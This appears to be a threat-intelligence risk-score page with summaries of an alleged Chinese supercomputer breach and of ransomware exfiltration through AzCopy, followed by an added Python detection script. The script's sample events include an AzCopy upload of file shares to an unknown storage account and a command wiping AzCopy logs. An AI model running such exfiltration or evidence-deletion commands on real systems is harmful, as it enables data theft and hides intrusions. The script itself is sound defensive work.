CTI A.I CyberSecurity Scoring
Company Information
Website: https://cybersecuritynews.com/
Employees number: 13
Number of followers: 213,326
NAICS: 5616
Industry Type: Security and Investigations
Homepage: cybersecuritynews.com
CTI Risk Score (AI oriented)
Between 650 and 699
Updated: 10/04/2026
671/1000
Weak
B
CTI Global Score (TPRM)
xxxx
Score locked

Current Score: 671 B (WEAK), on a scale of 0 to 1000
2 incidents
-43.5 avg impact
Incident timeline with MITRE ATT&CK tactics, techniques, and mitigations.
JUNE 2026
675
MAY 2026
672
APRIL 2026
734
Breach
10 Apr 2026 • CTI
China’s National Supercomputing Center in Tianjin: Data heist of the century? Hacker claims to steal top-secret files from China supercomputer - data up for sale
Massive Alleged Data Breach Targets China’s Supercomputing Center, Exposing Sensitive Defense and Scientific Research
671
CRITICAL-63
CYB1775831786
An alleged cyberattack on China’s National Supercomputing Center in Tianjin has sent shockwaves through the global cybersecurity community, with claims of over 10 petabytes of highly sensitive data stolen, potentially one of the largest breaches in modern history. The incident, reportedly carried out by a hacker group operating under the name "FlamingChina," involves defense-related documents, aerospace research, missile simulations, AI development, and nuclear fusion experiments, raising serious national security concerns.
The breach is said to have unfolded over several months, with attackers exploiting a compromised VPN to gain initial access before using distributed botnet tools to extract data in small, undetected chunks. This method, transferring files through multiple channels to evade security monitoring, allowed the operation to persist without triggering alerts. Cybersecurity experts describe the attack as a sustained, low-profile intrusion rather than a single event, highlighting vulnerabilities in large-scale infrastructure security.
Samples of the stolen data have surfaced on encrypted platforms like Telegram, with the full dataset reportedly priced in the hundreds of thousands of dollars, payable in cryptocurrency. While some leaked files, including technical diagrams and classified-marked documents, appear authentic upon initial review, full verification remains pending, and Chinese authorities have not publicly confirmed the breach. Analysts warn that if proven true, the exposure could provide foreign intelligence agencies with unprecedented insights into China’s advanced military and scientific research, including strategic defense capabilities and high-performance computing outputs.
The incident has intensified scrutiny of China’s cybersecurity posture, particularly in state-run supercomputing centers, which serve thousands of clients across defense, academia, and industry. Experts note that the breach underscores persistent weaknesses in perimeter defenses, even in advanced nations, and raises questions about the security of shared computing ecosystems critical to global research. While the attack’s sophistication was not exceptionally high, its success relied on exploiting architectural flaws, a reminder of the challenges in securing distributed, high-value targets.
As investigations continue, the breach has already sparked discussions on global cybersecurity cooperation and the need for stronger segmentation and monitoring in critical infrastructure. The full impact of the leak remains unclear, but if confirmed, it could reshape cyber intelligence competition and accelerate reforms in digital defense strategies worldwide.
MARCH 2026
757
Cyber Attack
04 Mar 2026 • CTI
Rhysida and Microsoft: AzCopy Utility Misused for Data Exfiltration in Ongoing Ransomware Attacks
Ransomware Groups Abuse Microsoft’s AzCopy for Stealthy Data Exfiltration
733
CRITICAL-24
CYBMIC1772619962
Ransomware operators are exploiting Microsoft’s trusted Azure data transfer tool, AzCopy, to covertly exfiltrate sensitive data before encryption. By leveraging this legitimate utility, commonly used for cloud migrations and backups, attackers evade detection, blending malicious activity into routine IT operations.
How the Attack Works
AzCopy, a command-line utility for moving large datasets to and from Azure Storage, is rarely flagged by endpoint detection and response (EDR) solutions due to its widespread corporate trust. Threat actors, including groups like BianLian and Rhysida, use AzCopy to bulk-upload stolen files to attacker-controlled Azure Blob storage via HTTPS connections to domains like `*.blob.core.windows.net`, which often bypass firewall restrictions.
Attackers gain access through compromised Azure credentials or storage keys, then generate Shared Access Signature (SAS) tokens embedded with permissions and time windows to execute transfers without interactive logins. To avoid detection, they throttle transfer speeds using the `--cap-mbps` flag and filter files with `--include-after` to target recent, high-value data.
Evasion and Detection Challenges
AzCopy’s use of legitimate cloud infrastructure and standard HTTPS traffic makes it difficult to distinguish from normal operations. In some cases, exfiltration went undetected by endpoint security tools, with attackers deleting local log files (`%USERPROFILE%\.azcopy`) to erase evidence. Traditional detection methods, which focus on third-party exfiltration tools, often miss these "living-off-the-land" attacks.
Mitigation and Response
Security teams must monitor for anomalous AzCopy activity, such as off-hours transfers or unusual data volumes under service accounts. User and Entity Behavior Analytics (UEBA) can flag abnormal file access, while network monitoring should restrict direct internet access from servers to known endpoints. Application control policies can limit AzCopy execution to approved hosts and accounts. Incident response plans should include steps to revoke SAS tokens, rotate keys, and coordinate with cloud providers to mitigate data loss.
As ransomware groups increasingly weaponize trusted cloud tools, organizations must adapt detection strategies to account for legitimate utilities being turned against them.
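The indicators described above (throttled transfers, recent-file filters, SAS-authenticated uploads to `*.blob.core.windows.net`, off-hours runs on unapproved hosts, and deletion of the `.azcopy` log directory) can be combined into a simple triage score over process-creation events. This is an added example, not code from the original report; the allowlists, host and storage account names, weights and threshold are assumptions, and the sample events are constructed.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Assumed allowlists for this example; replace with your own inventory.
APPROVED_HOSTS = {"BACKUP01"}
APPROVED_ACCOUNTS = {"corpbackups"}
BUSINESS_HOURS = range(7, 19)
URL_RE = re.compile(r"https://[^\s\"']+", re.I)

def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    low = ev["cmdline"].lower()
    # Deleting the AzCopy log/plan directory removes transfer evidence.
    if ".azcopy" in low and re.search(r"\b(del|rmdir|rd|remove-item)\b", low):
        return 3, ["AzCopy log directory deleted"]
    if not re.search(r"\bazcopy(\.exe)?[\"']?\s+(copy|sync)\b", low):
        return 0, []
    hits = []
    for url in URL_RE.findall(ev["cmdline"]):
        parts = urlsplit(url)
        host = parts.hostname or ""
        if host.endswith(".blob.core.windows.net"):
            account = host.split(".")[0]
            if account not in APPROVED_ACCOUNTS:
                hits.append((3, f"unapproved storage account: {account}"))
            if "sig" in parse_qs(parts.query):
                hits.append((1, "SAS token passed on command line"))
    if "--cap-mbps" in low:
        hits.append((2, "transfer throttled with --cap-mbps"))
    if "--include-after" in low:
        hits.append((1, "recent-file filter --include-after"))
    if ev["host"] not in APPROVED_HOSTS:
        hits.append((2, f"AzCopy run on unapproved host {ev['host']}"))
    if datetime.fromisoformat(ev["time"]).hour not in BUSINESS_HOURS:
        hits.append((1, "off-hours execution"))
    return sum(w for w, _ in hits), [r for _, r in hits]

def triage(events, threshold=3):
    """Return [(host, score, reasons)] for events at or above threshold."""
    scored = [(ev["host"], *score_event(ev)) for ev in events]
    return [row for row in scored if row[1] >= threshold]

# Constructed sample events (not real telemetry); SAS values are placeholders.
SAMPLE_EVENTS = [
    {"host": "BACKUP01", "time": "2026-03-02T10:15:00", "cmdline": r'azcopy.exe copy "D:\backups" "https://corpbackups.blob.core.windows.net/nightly?sv=2022-11-02&sig=CONSTRUCTED" --recursive'},
    {"host": "FILESRV07", "time": "2026-03-03T02:41:00", "cmdline": r'C:\ProgramData\azcopy.exe copy "E:\shares" "https://examplestore01.blob.core.windows.net/c1?sv=2022-11-02&sig=CONSTRUCTED" --recursive --cap-mbps 20 --include-after 2026-01-01'},
    {"host": "FILESRV07", "time": "2026-03-03T04:05:00", "cmdline": r"cmd.exe /c rmdir /s /q %USERPROFILE%\.azcopy"},
]

if __name__ == "__main__":
    for host, score, reasons in triage(SAMPLE_EVENTS):
        print(host, score, "; ".join(reasons))
```

The approved backup job scores 1 and stays below the threshold, while the throttled upload to an unknown storage account and the later log deletion on the same host both alert.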
FEBRUARY 2026
757
JANUARY 2026
757
DECEMBER 2025
757
NOVEMBER 2025
757
OCTOBER 2025
757
SEPTEMBER 2025
757
AUGUST 2025
757
JULY 2025
757